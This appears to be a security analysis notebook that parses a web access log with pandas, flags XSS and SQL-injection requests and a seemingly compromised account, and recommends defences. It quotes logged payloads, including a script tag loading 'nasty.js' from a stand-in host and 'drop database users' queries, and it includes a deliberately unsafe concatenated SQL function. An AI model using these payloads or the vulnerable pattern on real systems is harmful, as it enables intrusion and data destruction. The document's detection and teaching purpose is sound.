In [93]:
import re
import pandas as pd
import urllib.parse
pd.set_option('display.max_colwidth', None)
pd.options.display.max_rows = 100

def url_decode(string):
    return urllib.parse.unquote(string)

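data = pd.read_csv(
    'web_logs_2023-01-26.log',
    # Split on whitespace, except inside double quotes or square brackets,
    # so the quoted request and the bracketed timestamp stay in one field.
    sep=r'\s(?=(?:[^"]*"[^"]*")*[^"]*$)(?![^\[]*\])',
    engine='python',  # regex separators require the Python parser
    na_values='-',    # the log uses "-" for missing fields
    header=None,
    names=['ip', 'identity', 'userid', 'unknown', 'time', 'request', 'response', 'size', 'referer', 'user_agent', 'unknown2'],
    # URL-decode the request so encoded payloads are readable and searchable
    converters={'request': url_decode}
)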

## 1. Cross-Site Scripting

We see a number of what appear to be Cross-Site Scripting (XSS) attempts.

Cross-site scripting works by manipulating a vulnerable web site so that it returns malicious JavaScript to users. When the malicious code executes inside a victim's browser, the attacker can fully compromise their interaction with the application.

XSS vulnerabilities stem from a failure to properly validate or escape user input or dynamic content, which allows client-side JavaScript to be injected in a way that lets it execute. Your application is therefore at risk wherever it handles user input. XSS comes in several forms, which fall into the following groups:

* Reflected (non-persistent) XSS: As the name implies, reflected XSS occurs when the injected malicious script is immediately reflected back to the user in the server's response, without the content being adequately sanitized.

* Stored (persistent) XSS: This is a more devastating variant of a cross-site scripting flaw. It occurs when the data provided by the attacker is saved by the server and then permanently displayed on “normal” pages returned to other users in the course of regular browsing, without proper HTML escaping.

* DOM-based XSS: DOM-based XSS occurs when the injected malicious code never reaches the web server. Instead, it is processed and written into the page by JavaScript running in the browser.

### Recommendation

Preventing cross-site scripting is trivial in some cases but can be much harder depending on the complexity of the application and the ways it handles user-controllable data.

In general, effectively preventing XSS vulnerabilities is likely to involve a combination of the following measures:

* Filter input on arrival. At the point where user input is received, filter as strictly as possible based on what is expected or valid input.

* Encode data on output. At the point where user-controllable data is output in HTTP responses, encode the output to prevent it from being interpreted as active content. Depending on the output context, this might require applying combinations of HTML, URL, JavaScript, and CSS encoding.

* Use appropriate response headers. To prevent XSS in HTTP responses that aren't intended to contain any HTML or JavaScript, you can use the Content-Type and X-Content-Type-Options headers to ensure that browsers interpret the responses in the way you intend.

* Content Security Policy. As a last line of defense, you can use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur.
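
As an illustration of the "encode data on output" measure, here is a minimal sketch using only the Python standard library. The function names `render_search_result` and `build_link` are hypothetical, and the payload is the one seen in the logs (with its closing tag completed for the example). A real application would normally rely on its template engine's auto-escaping rather than hand-rolled helpers like these.

```python
import html
from urllib.parse import quote


def render_search_result(user_input: str) -> str:
    """Embed untrusted text in an HTML body context (hypothetical helper)."""
    # html.escape turns &, < and > into entities; quote=True also escapes quotes.
    safe = html.escape(user_input, quote=True)
    return f"<p>You searched for: {safe}</p>"


def build_link(user_input: str) -> str:
    """Embed untrusted text in a URL inside an HTML attribute (hypothetical helper)."""
    # URL context: percent-encode first, then escape for the attribute context.
    href = "/search?q=" + quote(user_input, safe="")
    return f'<a href="{html.escape(href, quote=True)}">search again</a>'


payload = '<script src="http://www.badplace.com/nasty.js"></script>'
print(render_search_result(payload))
print(build_link(payload))
```

In both cases the payload ends up as inert text: the browser shows it (or sends it as a query value) instead of loading the external script.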

### References

https://www.comparitech.com/net-admin/how-to-find-xss-vulnerability/


In [94]:
data[data.request.str.contains('.js', regex=False, na=False)][["ip","userid","request","response"]]

Unnamed: 0,ip,userid,request,response
65,80.37.69.128,Theresa,"""PUT /cart?data=<script src=""http://www.badplace.com/nasty.js""></script%3 HTTP/1.0""",200
120,201.138.110.200,Theresa,"""POST /admin/remove_product?data=<script src=""http://www.badplace.com/nasty.js""></script%3 HTTP/1.0""",200
158,81.91.56.115,Theresa,"""DELETE /admin/remove_user?data=<script src=""http://www.badplace.com/nasty.js""></script%3 HTTP/1.0""",200
205,1.243.92.78,Theresa,"""DELETE /login?data=<script src=""http://www.badplace.com/nasty.js""></script%3 HTTP/1.0""",200
336,130.183.166.199,Theresa,"""DELETE /purchase?data=<script src=""http://www.badplace.com/nasty.js""></script%3 HTTP/1.0""",200
341,63.144.139.231,Theresa,"""PUT /register?data=<script src=""http://www.badplace.com/nasty.js""></script%3 HTTP/1.0""",200
393,142.217.67.17,Theresa,"""GET /admin?data=<script src=""http://www.badplace.com/nasty.js""></script%3 HTTP/1.0""",303
517,223.195.119.35,,"""GET ?data=<script src=""http://www.badplace.com/nasty.js""></script%3/4037403083972567-254-05/29 HTTP/1.0""",200
552,204.210.110.56,Theresa,"""DELETE /purchase?data=<script src=""http://www.badplace.com/nasty.js""></script%3 HTTP/1.0""",200
553,199.71.89.79,Theresa,"""POST /admin/add_user?data=<script src=""http://www.badplace.com/nasty.js""></script%3 HTTP/1.0""",200


## 2. SQL Injections

We see a number of what appear to be SQL injection attempts.

SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior.

In some situations, an attacker can escalate an SQL injection attack to compromise the underlying server or other back-end infrastructure, or perform a denial-of-service attack.

### Recommendation

Most instances of SQL injection can be prevented by using parameterized queries (also known as prepared statements) instead of string concatenation within the query. 
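
The difference between string concatenation and a parameterized query can be sketched with the standard-library `sqlite3` module. The table layout, the sample rows, and the function names `find_user_unsafe` and `find_user_safe` are assumptions made for this example; the site's actual database and schema are not known from the logs.

```python
import sqlite3

# In-memory database with a hypothetical users table.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id TEXT PRIMARY KEY, name TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?)", [("1", "alice"), ("2", "bob")])


def find_user_unsafe(conn, user_id):
    # Vulnerable: user_id is spliced directly into the SQL text.
    query = f"SELECT name FROM users WHERE id = '{user_id}'"
    return conn.execute(query).fetchall()


def find_user_safe(conn, user_id):
    # The ? placeholder passes user_id as data, so it is never parsed as SQL.
    return conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchall()


injected = "x' OR '1'='1"
print(len(find_user_unsafe(conn, injected)))  # every row is returned
print(find_user_safe(conn, injected))         # no row has this literal id
print(find_user_safe(conn, "1"))
```

With the placeholder version, a value such as `drop database users` from the requests below would simply be compared against the `id` column as a string.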

### References

https://portswigger.net/web-security/sql-injection
https://portswigger.net/kb/issues/00400480_sql-statement-in-request-parameter


In [95]:
data[data.request.str.contains('drop', regex= True, na=False)][["ip","userid","request","response"]]

Unnamed: 0,ip,userid,request,response
17,136.201.74.75,Theresa,"""PUT /purchase/completed?id=drop+database+users HTTP/1.0""",200
43,207.77.8.212,Theresa,"""POST /admin?id=drop+database+users HTTP/1.0""",304
137,72.157.181.140,Theresa,"""DELETE /purchase?id=drop+database+users HTTP/1.0""",200
144,201.79.34.146,Theresa,"""GET /admin/remove_user?id=drop+database+users HTTP/1.0""",200
149,137.135.121.45,Theresa,"""GET /register?id=drop+database+users HTTP/1.0""",200
187,123.230.181.187,Theresa,"""POST /register?id=drop+database+users HTTP/1.0""",200
269,42.46.68.21,Theresa,"""GET /cart?id=drop+database+users HTTP/1.0""",200
474,36.105.48.234,Theresa,"""DELETE /login?id=drop+database+users HTTP/1.0""",303
564,13.0.140.201,Theresa,"""DELETE /admin/remove_user?id=drop+database+users HTTP/1.0""",403
617,89.196.253.13,Theresa,"""DELETE /cart?id=drop+database+users HTTP/1.0""",200


In [96]:
data[data.request.str.contains('SELECT', regex= True, na=False)][["ip","userid","request","response"]]

Unnamed: 0,ip,userid,request,response
21,151.203.93.88,Theresa,"""DELETE /register?id=SELECT+name+FROM+users HTTP/1.0""",200
93,167.106.101.104,Theresa,"""POST /purchase?id=SELECT+name+FROM+users HTTP/1.0""",200
110,115.76.49.102,Theresa,"""DELETE /admin/remove_user?id=SELECT+name+FROM+users HTTP/1.0""",200
184,78.245.211.54,Theresa,"""PUT /admin/add_user?id=SELECT+name+FROM+users HTTP/1.0""",200
197,148.75.121.166,Theresa,"""POST /admin/add_product?id=SELECT+name+FROM+users HTTP/1.0""",303
207,115.101.230.8,Theresa,"""PUT /cart?id=SELECT+name+FROM+users HTTP/1.0""",200
216,203.2.14.111,Theresa,"""POST /admin/add_product?id=SELECT+name+FROM+users HTTP/1.0""",200
310,122.171.115.111,Theresa,"""POST /admin/add_product?id=SELECT+name+FROM+users HTTP/1.0""",200
468,198.131.5.220,Theresa,"""GET /register?id=SELECT+name+FROM+users HTTP/1.0""",200
679,97.210.10.127,Theresa,"""POST /register?id=SELECT+name+FROM+users HTTP/1.0""",200


## 3. Compromised Credentials

(Almost) all of the malicious requests are made under Theresa's user ID, while the client IPs vary widely. This suggests that Theresa's credentials have been compromised and are being actively used to attack the site.

Requests against the `/login` endpoint suggest that a brute-force login attack may have taken place: a number of `403` responses were returned to multiple client IPs, and no other users made login attempts in the period in question.
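
One way to quantify "one user, many client IPs" is to count the distinct addresses seen per user ID. The sketch below uses only the standard library and a handful of `(ip, userid)` pairs copied from the log excerpts in this notebook; the function name `distinct_ips_per_user` is hypothetical. On the full DataFrame, something like `data.groupby('userid')['ip'].nunique()` should give the same kind of summary.

```python
from collections import defaultdict

# A few (ip, userid) pairs copied from the excerpts in this notebook;
# None stands for a missing userid.
rows = [
    ("62.21.196.194", "Theresa"),
    ("136.201.74.75", "Theresa"),
    ("151.203.93.88", "Theresa"),
    ("207.60.25.21", "Theresa"),
    ("111.237.69.83", None),
    ("111.237.69.83", None),
]


def distinct_ips_per_user(rows):
    """Return {userid: number of distinct client IPs}, skipping anonymous rows."""
    ips = defaultdict(set)
    for ip, userid in rows:
        if userid is not None:
            ips[userid].add(ip)
    return {user: len(addresses) for user, addresses in ips.items()}


print(distinct_ips_per_user(rows))
```

A single account appearing from a different address on nearly every request is unusual for a genuine user and supports the compromised-credentials reading.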

### Recommendation

1. Use stronger passwords
2. Limit number of login attempts
3. Use CAPTCHAs
4. Enforce two-factor authentication
5. Monitor attempted logins

### References

https://portswigger.net/web-security/access-control  
https://wishdesk.com/blog/guide-to-brute-force-attack

In [97]:
data[data.userid.str.contains('Theresa', regex= True, na=False)][["ip","userid","request","response"]]

Unnamed: 0,ip,userid,request,response
2,62.21.196.194,Theresa,"""POST /admin HTTP/1.0""",200
17,136.201.74.75,Theresa,"""PUT /purchase/completed?id=drop+database+users HTTP/1.0""",200
21,151.203.93.88,Theresa,"""DELETE /register?id=SELECT+name+FROM+users HTTP/1.0""",200
30,207.60.25.21,Theresa,"""PUT /admin/add_user HTTP/1.0""",200
31,32.219.87.143,Theresa,"""DELETE /admin HTTP/1.0""",403
43,207.77.8.212,Theresa,"""POST /admin?id=drop+database+users HTTP/1.0""",304
44,47.51.127.36,Theresa,"""POST /admin/add_product HTTP/1.0""",200
65,80.37.69.128,Theresa,"""PUT /cart?data=<script src=""http://www.badplace.com/nasty.js""></script%3 HTTP/1.0""",200
70,10.147.83.64,Theresa,"""POST /cart HTTP/1.0""",200
93,167.106.101.104,Theresa,"""POST /purchase?id=SELECT+name+FROM+users HTTP/1.0""",200


In [98]:
df1 = data[data.request.str.contains('login', regex= True, na=False)][["ip","time","userid","request","response"]]
df1

Unnamed: 0,ip,time,userid,request,response
4,78.144.28.132,[2023-01-26 15:45:45 +00:00],,"""POST /login HTTP/1.0""",200
13,102.53.65.86,[2023-01-26 15:45:45 +00:00],,"""PUT /login HTTP/1.0""",200
19,121.193.109.2,[2023-01-26 15:45:45 +00:00],,"""POST /login HTTP/1.0""",200
25,59.219.254.101,[2023-01-26 15:45:45 +00:00],,"""POST /login HTTP/1.0""",200
34,111.237.69.83,[2023-01-26 15:45:45 +00:00],,"""PUT /login HTTP/1.0""",200
39,111.237.69.83,[2023-01-26 15:45:45 +00:00],,"""DELETE /login HTTP/1.0""",200
49,113.127.197.68,[2023-01-26 15:45:45 +00:00],,"""PUT /login HTTP/1.0""",200
54,223.195.119.35,[2023-01-26 15:45:45 +00:00],,"""PUT /login HTTP/1.0""",200
57,12.92.165.166,[2023-01-26 15:45:45 +00:00],,"""POST /login HTTP/1.0""",200
68,83.1.237.231,[2023-01-26 15:45:45 +00:00],,"""PUT /login HTTP/1.0""",200


In [99]:
df2 = df1[df1['response'] == 403]
df2

Unnamed: 0,ip,time,userid,request,response
127,43.22.168.182,[2023-01-26 15:45:45 +00:00],Theresa,"""DELETE /login HTTP/1.0""",403
472,78.144.28.132,[2023-01-26 15:45:45 +00:00],,"""POST /login HTTP/1.0""",403
573,20.93.153.227,[2023-01-26 15:45:45 +00:00],Theresa,"""GET /login HTTP/1.0""",403
666,223.195.119.35,[2023-01-26 15:45:45 +00:00],,"""POST /login HTTP/1.0""",403
839,223.195.119.35,[2023-01-26 15:45:45 +00:00],,"""DELETE /login HTTP/1.0""",403


### HTTP Response Codes for Reference

| Code | Description   |
|------|---------------|
| 1xx  | Informational |
| 2xx  | Successful    |
| 3xx  | Redirection   |
| 4xx  | Client Error  |
| 5xx  | Server Error  |